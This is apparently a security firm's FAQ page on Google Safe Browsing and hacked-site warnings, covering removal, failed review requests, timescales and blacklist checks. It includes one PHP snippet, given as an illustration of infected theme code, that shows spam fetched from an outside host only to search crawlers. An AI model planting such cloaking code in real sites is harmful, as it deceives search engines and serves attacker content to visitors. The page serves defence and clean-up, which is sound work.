What do Google's hacked and blacklist warnings mean?

Google shows these warnings when its Safe Browsing systems or search quality checks detect harmful or hacked content on your site. "Deceptive site ahead" means phishing, "The site ahead contains malware" means harmful code, and "This site may be hacked" in search results usually means spam pages or content injected by an attacker.

WarningWhere it appearsUsual cause
Deceptive site aheadFull-page red screen in Chrome and other browsersPhishing kit hosted on your domain
The site ahead contains malwareFull-page browser warningMalicious scripts or downloads
This site may be hackedUnder your listing in Google resultsSEO spam, Japanese keyword or pharma hack
Security Issues reportGoogle Search ConsoleAny of the above, with sample URLs

You can check your domain's status yourself with Google's Safe Browsing site status tool in the Google Transparency Report.

How do you get a Google blacklist warning removed?

You remove the infection completely, fix the way in, then request a review in Google Search Console's Security Issues report. Google re-checks the site and lifts the warning if it finds no remaining problems. If anything is left, the review fails and later reviews can take longer, so the clean-up has to be thorough first time.

  1. Verify ownership in Search Console. If an attacker has added themselves as an owner, remove them and their verification file.
  2. Read the sample URLs. Google lists examples of affected pages. They are a starting point, not a full list.
  3. Clean everything. Remove the malicious content, the webshell or backdoor that delivered it, and any persistence on the server.
  4. Fix the entry point. Update or remove the vulnerable component and rotate credentials.
  5. Request a review. Describe what was found, what was removed and what was changed to prevent it happening again.

Our step-by-step guide to removing a Google blacklist warning covers each stage in more detail.

Why do Google review requests get rejected?

Reviews are usually rejected because the site is still infected. The most common reasons are malware that is only shown to Googlebot or to mobile visitors, a backdoor that reinstalls the malware after cleaning, or spam pages that were not all removed. Cloaked infections look clean when you visit the site yourself.

A cloaking check often looks like this in an infected theme file, showing spam only to search engine crawlers:

if ( preg_match( '/googlebot|bingbot/i', $_SERVER['HTTP_USER_AGENT'] ) ) {
    echo file_get_contents( 'http://198.51.100.9/feed/' . $_SERVER['HTTP_HOST'] );
}

Our Malware sweep looks for this kind of conditional code across every file and the database, and our Forensic scan checks for the server-level persistence that causes repeat warnings. See SEO spam hack removal for more examples.

How long does Google take to remove the warning?

Google sets its own review times and they vary by issue type. According to Google's Search Console documentation, malware and phishing reviews are generally faster, while reviews for sites hacked with spam can take considerably longer. Nobody outside Google can guarantee a timescale, and anyone who promises one is guessing.

What we can control is the quality of the clean-up and the review request. A complete clean, with a clear description of what was fixed, gives the review the best chance of succeeding first time. Spam URLs can also linger in search results after the warning is lifted; we help you remove them using Search Console's removals tool and correct HTTP status codes.

Tip: other services, including antivirus vendors and email providers, keep their own blocklists. Once Google clears the site, we check the major ones and request delisting where needed.

How can you check if your site is blacklisted?

The quickest checks are Google's Safe Browsing site status tool, the Security Issues report in Google Search Console, and a search for site:yourdomain.co.uk to spot spam pages. Visit the site on mobile in a private window too, because many infections hide from desktop visitors and logged-in administrators.

  1. Safe Browsing site status. Enter your domain in Google's Transparency Report tool to see whether it is currently flagged.
  2. Search Console Security Issues. If you have verified the site, this report lists the issue type and sample URLs.
  3. Site search. Search site:example.co.uk and look for pages, titles or languages you do not recognise.
  4. Mobile, private window. Visit from a phone on mobile data, not logged in, and follow a link from Google results.
  5. Safe Browsing site status. Google's Safe Browsing site status tool shows whether your domain is currently listed.

A clean result on these checks does not prove the server is clean. Malware often hides server-side and only appears to certain visitors, which is why we follow up with a full forensic scan before any review request.